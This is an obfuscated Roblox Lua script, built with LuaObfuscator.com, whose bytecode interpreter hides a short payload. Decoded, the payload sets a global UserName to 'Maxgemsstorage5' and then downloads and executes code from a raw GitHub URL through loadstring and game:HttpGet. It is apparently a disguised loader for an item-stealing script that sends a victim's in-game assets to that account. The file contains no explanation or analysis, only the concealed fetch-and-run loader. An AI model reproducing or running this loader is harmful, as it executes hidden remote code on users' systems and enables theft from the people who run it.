--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==2) then v22=function()local v39=v1(v16,v19,v19);v19=v19 + 1 ;return v39;end;v23=nil;v23=function()local v40=1518 -(1220 + 298) ;local v41;local v42;while true do if (1==v40) then return (v42 * (169 + 87)) + v41 ;end if (v40==(0 + 0)) then v41,v42=v1(v16,v19,v19 + (5 -3) );v19=v19 + (473 -(229 + 242)) ;v40=2 -1 ;end end end;v18=3;end if (v18==3) then v24=nil;v24=function()local v43,v44,v45,v46=v1(v16,v19,v19 + (313 -(290 + 20)) );v19=v19 + 2 + 2 ;return (v46 * (13401692 + 3375524)) + (v45 * (66990 -(1379 + 75))) + (v44 * ((658 + 76) -478)) + v43 ;end;v25=nil;v18=4;end if (v18==7) then v30=function(v31,v32,v33)local v47=v31[1];local v48=v31[2];local v49=v31[3];return function(...)local v66=0;local v67;local v68;local v69;local v70;local v71;while true do if (v66==3) then A,B=v28(v11(v71));if  not A[1] then local v91=0;local v92;while true do if (v91==0) then v92=v31[4][v67] or "?" ;error("Script error at ["   .. v92   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end break;end if (0==v66) then v67=1;v68= -1;v66=1;end if (v66==2) then v71=nil;v71=function()local v81=v47;local v82=v48;local v83=v49;local v84=v28;local v85={};local v86={};local v87={};for v93=0,v70 do if ((v93>=v83) or ((3162 -(33 + 1925))>(1020 + 246))) then v85[v93-v83 ]=v69[v93 + (745 -(152 + 592)) ];else v87[v93]=v69[v93 + 1 + 0 ];end end local v88=(v70-v83) + 1 + (1160 -(606 + 554)) ;local v89;local v90;while true do local v94=0 -0 ;while true do if (((2863 -(303 + 39))<=(38 + 3312 + 1181)) and (1==v94)) then if ((v90<=(11 -6)) or ((875 + 148)>((4470 -(252 + 49)) -(823 + 209)))) then if ((v90<=(176 -(8 + 166))) or ((2354 + 80)>=(3733 -(64 + 745)))) then if ((v90<=(0 -0)) or ((853 + 4099)<=4617)) then v67=v89[3];elseif (((6317 -3482)>((1425 -361) + 102)) and (v90==1)) then for v142=v89[9 -7 ],v89[6 -3 ] do v87[v142]=nil;end else v87[v89[2 + 0 ]]=v33[v89[1305 -(475 + 827) ]];end elseif (((2692 -(263 + 283))<(8241 -5272)) and (v90<=(5 -2))) then local v109=1293 -(846 + 447) ;local v110;local v111;local v112;local v113;local v114;local v115;while true do if ((v109==3) or ((6877 -2235)<(1813 + 965))) then while true do if (((3199 -(684 + 199))==((5777 -3971) + 510)) and ((1447 -(418 + 1029))==v110)) then v111=0;v112=nil;v110=1;end if (((7659 -5502)<3767) and (v110==(5 -3))) then v115=nil;while true do if ((v111==((2723 -1567) -(1119 + 36))) or ((10413 -5755)<(4176 + (1004 -681)))) then local v159=0;local v160;while true do if ((3413<=(9599 -4619)) and (v159==(357 -(297 + 60)))) then v160=0;while true do if ((v160==(4 -3)) or ((2401 + 2437)<=(1303 -(16 + 208)))) then v111=1 + 1 ;break;end if ((v160==(0 -0)) or ((5889 -(573 + 629))<=(382 + 390))) then local v169=0 -0 ;while true do if ((v169==(1687 -((2822 -(23 + 1612)) + 98 + 402))) or ((3078 -(51 + 206))<((2911 -(53 + 157)) -(225 + 146)))) then v68=(v114 + v112) -1 ;v115=0 + 0 ;v169=2 -1 ;end if ((v169==(2 -1)) or ((303 + 160 + 1070)==(5273 -3273))) then v160=2 -1 ;break;end end end end break;end end end if (((6170 -(1606 + 259))>(13209 -10193)) and ((0 + 0)==v111)) then local v161=0;local v162;while true do if ((v161==(0 -0)) or (((1303 -(305 + 123)) -(235 + 377))<=(157 -68))) then v162=818 -(180 + 638) ;while true do if (((1211 + 462)==(3060 -1387)) and (v162==(952 -(73 + (1553 -(444 + 230)))))) then local v170=0 -0 ;while true do if ((((3042 -(1221 + 386)) -(8 + 123))>=125) and ((197 -(87 + 110))==v170)) then v112=v89[58 -(10 + 46) ];v113,v114=v84(v87[v112](v13(v87,v112 + (1857 -(1387 + 469)) ,v89[2 + 1 ])));v170=1;end if ((v170==(1517 -(533 + 983))) or ((6560 -(1426 + 1439))<(8528 -5577))) then v162=1 + 0 ;break;end end end if (((56 + (655 -371))<=3296) and ((1 + 0)==v162)) then v111=1 + 0 ;break;end end break;end end end if ((v111==(5 -3)) or ((3945 -2305)>(798 + 2716))) then for v163=v112,v68 do local v164=0 + (0 -0) ;local v165;while true do if ((v164==(0 + 0)) or ((97 + 1300)>3918)) then v165=0 -0 ;while true do if ((v165==(0 + 0)) or ((1727 -(721 + 323))==(4126 -1891))) then v115=v115 + (2 -1) ;v87[v163]=v113[v115];break;end end break;end end end break;end end break;end if ((v110==1) or (((2732 -1820) -470)>=(1939 + 622 + 39))) then v113=nil;v114=nil;v110=5 -3 ;end end break;end if ((v109==(1 + 1)) or ((4727 -2763)<=(2326 -(526 + 1358)))) then v114=nil;v115=nil;v109=(1188 -(11 + 229)) -(770 + 175) ;end if (((851 -(252 + 221))<(10282 -7301)) and (v109==0)) then v110=0 -(0 + 0) ;v111=nil;v109=1 + 0 ;end if ((v109==((2 -1) + 0)) or ((2888 -(7 + 618))<=(1382 + 179))) then v112=nil;v113=nil;v109=(6506 -5076) -(749 + 679) ;end end elseif ((v90>(8 -4)) or ((15204 -11174)<=(1224 -(172 + 250)))) then v87[v89[2 + 0 + 0 ]]=v89[3];else v87[v89[8 -6 ]]();end elseif (((447 + 358)<=1874) and (v90<=(1136 -(44 + 1084)))) then if (((224 + (1093 -(179 + 714)))<=(731 -(20 + 263))) and (v90<=(9 -3))) then do return;end elseif ((v90==(28 -21)) or ((373 + 4177)<=355)) then v33[v89[739 -(412 + 324) ]]=v87[v89[2]];else local v137=0 + 0 ;local v138;while true do if ((0==v137) or ((370 + 1838 + 1783)<=2823)) then v138=v89[1221 -(804 + 415) ];v87[v138]=v87[v138](v13(v87,v138 + (1 -0) ,v68));break;end end end elseif ((4036==4036) and (v90<=(4 + 5))) then v87[v89[4 -2 ]]=v89[6 -3 ]~=(0 -0) ;elseif ((2193>=1799) and (v90==10)) then local v139=0 + 0 ;local v140;local v141;while true do if ((((4654 -2864) -(345 + 1255))<=3240) and (v139==(0 + 0))) then v140=v89[2];v141=v87[v89[8 -5 ]];v139=1206 -(6 + 1199) ;end if (((4844 -1342)>=((17353 -12839) -(929 + 351))) and (v139==(1754 -(433 + 1320)))) then v87[v140 + 1 + 0 ]=v141;v87[v140]=v141[v89[2 + 2 ]];break;end end elseif (((187 + 1778)<(3098 -(388 + 173))) and (v87[v89[1211 -(961 + 248) ]]==v89[1671 -(751 + 916) ])) then v67=v67 + ((530 -300) -(80 + 149)) ;else v67=v89[1133 -(47 + 1083) ];end v67=v67 + 1 + 0 ;break;end if ((v94==(725 -(426 + 299))) or (((1081 -493) + 491)>=(7129 -3300))) then local v99=0 -0 ;while true do if ((v99==(1561 -(185 + 1375))) or ((4017 -(542 + 190))<=(848 -(403 + 147)))) then v94=1 + 0 ;break;end if (((3401 -(780 + 584))<=(15784 -10789)) and (v99==(1978 -(953 + 1025)))) then v89=v81[v67];v90=v89[1];v99=1;end end end end end end;v66=3;end if (v66==1) then v69={...};v70=v12("#",...) -1 ;v66=2;end end end;end;return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;v21=function(v34,v35,v36)if v36 then local v74=1922 -(422 + 1500) ;local v75;while true do if ((0 -0)==v74) then v75=(v34/(2^(v35-(1 + 0))))%((5 -3)^(((v36-(1809 -(1787 + 21))) -(v35-((3 + 0) -2))) + (1 -0))) ;return v75-(v75%(1635 -((2614 -1362) + 382))) ;end end else local v76=0 -0 ;local v77;while true do if (v76==(351 -(40 + 311))) then v77=(899 -(811 + 86))^(v35-(1257 -(964 + 292))) ;return (((v34%(v77 + v77))>=v77) and (1 + 0 + 0)) or (0 + 0) ;end end end end;v22=nil;v18=2;end if (v18==5) then v27=v24;v28=nil;v28=function(...)return {...},v12("#",...);end;v18=6;end if (v18==6) then v29=nil;v29=function()local v50=0;local v51;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (3~=v50) then else v57=nil;while true do local v79=0 -0 ;while true do if (v79~=(0 + 0)) then else if (v51==3) then local v100=0;local v101;while true do if (v100==0) then v101=0;while true do if (v101==(0 -0)) then local v117=0;while true do if (v117~=(1 + 0)) then else v101=3 -2 ;break;end if (v117~=(0 -0)) then else for v145=1,v24() do v53[v145-(1 + 0) ]=v29();end for v147=1,v24() do v54[v147]=v24();end v117=292 -(156 + 135) ;end end end if (v101~=(855 -(101 + 753))) then else return v55;end end break;end end end if (v51==(1575 -(896 + 679))) then v52={};v53={};v54={};v51=1;end v79=1;end if (v79~=1) then else if (v51==2) then local v102=0;local v103;while true do if (v102==(0 + 0)) then v103=0;while true do if (v103~=1) then else for v119=1,v24() do local v120=234 -(212 + 22) ;local v121;local v122;local v123;local v124;while true do if (1==v120) then v123=nil;v124=nil;v120=2;end if (v120==0) then v121=0;v122=nil;v120=1 + 0 ;end if (v120~=(1 + 1)) then else while true do if (v121~=1) then else v124=nil;while true do if (v122~=(1485 -(842 + 642))) then else while true do if (v123==(0 + 0)) then v124=v22();if (v21(v124,1 + 0 ,1 + 0 )==(29 -(14 + 15))) then local v171=0;local v172;local v173;local v174;local v175;while true do if ((1605 -(778 + 827))==v171) then local v179=0;while true do if (v179==0) then v172=250 -(216 + 34) ;v173=nil;v179=1898 -(731 + 1166) ;end if (v179==(1 + 0)) then v171=104 -(9 + 94) ;break;end end end if (v171==(2 + 0)) then while true do if (v172==2) then local v181=0;while true do if (v181==1) then v172=869 -(146 + 720) ;break;end if (v181~=(0 + 0)) then else if (v21(v174,2 -1 ,508 -(182 + 325) )~=1) then else v175[2 + 0 ]=v57[v175[1 + 1 ]];end if (v21(v174,2,2)~=1) then else v175[6 -3 ]=v57[v175[3]];end v181=1;end end end if (v172==1) then local v182=0;while true do if (0~=v182) then else v175={v23(),v23(),nil,nil};if (v173==(1510 -(27 + 1483))) then local v192=0 -0 ;while true do if (v192==(0 + 0)) then v175[3]=v23();v175[1404 -(9 + 1391) ]=v23();break;end end elseif (v173==(1809 -(237 + 1571))) then v175[555 -(222 + 330) ]=v24();elseif (v173==(1 + 1)) then v175[1866 -(1085 + 778) ]=v24() -(2^16) ;elseif (v173==3) then local v197=0;local v198;while true do if (v197~=0) then else v198=0 -0 ;while true do if (v198==0) then v175[3]=v24() -(2^(51 -35)) ;v175[3 + 1 ]=v23();break;end end break;end end end v182=1468 -(777 + 690) ;end if (v182==(941 -(95 + 845))) then v172=2 + 0 ;break;end end end if (v172~=3) then else if (v21(v174,3,9 -6 )==(1 -0)) then v175[4]=v57[v175[5 -1 ]];end v52[v119]=v175;break;end if (v172~=0) then else local v184=0 + 0 ;local v185;while true do if (v184==(143 -(72 + 71))) then v185=0;while true do if (v185==(1 + 0)) then v172=1;break;end if (v185==0) then v173=v21(v124,6 -4 ,1 + 2 );v174=v21(v124,4,6);v185=2 -1 ;end end break;end end end end break;end if ((1 + 0)~=v171) then else local v180=0;while true do if (v180~=(1 + 0)) then else v171=7 -5 ;break;end if (v180==0) then v174=nil;v175=nil;v180=1813 -(1664 + 148) ;end end end end end break;end end break;end if (v122==0) then local v166=451 -(234 + 217) ;while true do if ((3 -2)==v166) then v122=3 -2 ;break;end if (v166==(302 -(262 + 40))) then v123=0 + 0 ;v124=nil;v166=3 -2 ;end end end end break;end if (0==v121) then local v157=0;while true do if (v157~=(2 -1)) then else v121=1;break;end if (0==v157) then v122=0;v123=nil;v157=1 -0 ;end end end end break;end end end v51=1 + 2 ;break;end if (v103==(0 + 0)) then for v125=1 -0 ,v56 do local v126=0;local v127;local v128;local v129;local v130;while true do if (v126~=(1 + 0)) then else v129=nil;v130=nil;v126=1 + 1 ;end if (v126~=(0 + 0)) then else local v149=0 + 0 ;while true do if (v149==(1 + 0)) then v126=1 -0 ;break;end if ((0 -0)==v149) then v127=0;v128=nil;v149=1 -0 ;end end end if (v126==2) then while true do if ((0 + 0)~=v127) then else local v158=0 -0 ;while true do if (v158==(1 -0)) then v127=1;break;end if (v158==0) then v128=0;v129=nil;v158=1;end end end if (v127~=(1 + 0)) then else v130=nil;while true do if (v128==(0 -0)) then local v167=1050 -(1048 + 2) ;while true do if (0==v167) then v129=v22();v130=nil;v167=2 -1 ;end if (v167~=(1 -0)) then else v128=3 -2 ;break;end end end if (v128==(1 + 0)) then if (v129==(3 -2)) then v130=v22()~=0 ;elseif (v129==(2 -0)) then v130=v25();elseif (v129==(11 -8)) then v130=v26();end v57[v125]=v130;break;end end break;end end break;end end end v55[3]=v22();v103=1;end end break;end end end if (1==v51) then local v104=0;while true do if ((0 + 0)~=v104) then else local v107=0;while true do if ((759 -(465 + 294))==v107) then v55={v52,v53,nil,v54};v56=v24();v107=1;end if (v107==1) then v104=1 + 0 ;break;end end end if (v104~=1) then else v57={};v51=2;break;end end end break;end end end break;end if (v50~=0) then else v51=0;v52=nil;v50=1;end if (v50==(1 + 0)) then v53=nil;v54=nil;v50=2;end if (v50==(5 -3)) then v55=nil;v56=nil;v50=3;end end end;v30=nil;v18=7;end if (v18==4) then v25=function()local v58=v24();local v59=v24();local v60=1 + 0 ;local v61=(v21(v59,486 -((268 -148) + 365) ,59 -39 ) * ((2 -0)^32)) + v58 ;local v62=v21(v59,21,17 + 14 );local v63=((v21(v59,103 -71 )==(1 + 0)) and  -1) or (503 -(293 + 209)) ;if (v62==(0 -0)) then if (v61==(0 + 0)) then return v63 * (0 -0) ;else v62=(3445 -(738 + 959)) -(651 + 1096) ;v60=0 + 0 ;end elseif (v62==(1096 + 951)) then return ((v61==(0 -0)) and (v63 * (1/0))) or (v63 * NaN) ;end return v8(v63,v62-(930 + 13 + 80) ) * (v60 + (v61/((6 -4)^(1258 -(762 + 444))))) ;end;v26=nil;v26=function(v37)local v64;if  not v37 then v37=v24();if (v37==(1038 -(297 + 741))) then return "";end end v64=v3(v16,v19,(v19 + v37) -(1 + 0) );v19=v19 + v37 ;local v65={};for v72=1 + 0 , #v64 do v65[v72]=v2(v1(v3(v64,v72,v72)));end return v6(v65);end;v18=5;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v38)if (v1(v38,2)==79) then v20=v0(v3(v38,1,1));return "";else local v78=v2(v0(v38,16));if v20 then local v80=v5(v78,v20);v20=nil;return v80;else return v78;end end end);v18=1;end end end v15("LOL!073O00028O0003083O00557365724E616D65030F3O004D617867656D2O73746F7261676535030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403323O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F507378302F412F6D61696E2F6D61696E00163O0012053O00014O0001000100013O00260B3O00020001000100044O00020001001205000100013O00260B000100050001000100044O00050001001205000200033O001207000200023O001202000200043O001202000300053O00200A000300030006001205000500074O0009000600014O0003000300064O000800023O00022O000400020001000100044O0015000100044O0005000100044O0015000100044O000200012O00063O00017O00163O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v9(),...);end
